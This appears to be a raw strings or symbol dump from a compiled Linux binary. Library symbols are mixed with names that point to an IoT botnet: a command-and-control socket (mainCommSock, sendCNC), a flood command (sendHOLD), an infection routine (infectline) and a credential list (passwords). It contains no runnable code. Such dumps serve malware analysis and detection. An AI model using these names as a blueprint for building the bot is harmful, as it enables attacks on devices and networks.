__GI_strtok_r
__GI_errno
__libc_sendto
A Santa lives evil at NASA
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
__GI_raise
__data_start
setsid
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
infectline
macAddress
__GI___errno_location
readUntil
fcntl
__GI_atoi
fseeko64
__GI_sprintf
tcsetattr
__ctype_tolower
__register_frame_info
wcrtomb
__GI_getsockname
close
__libc_connect
passwords
__GI_strlen
sendHOLD
mainCommSock
pids
sendCNC
vfprintf
strpbrk
getBogos
_load_inttype
raise
free
sigprocmask
getsockname
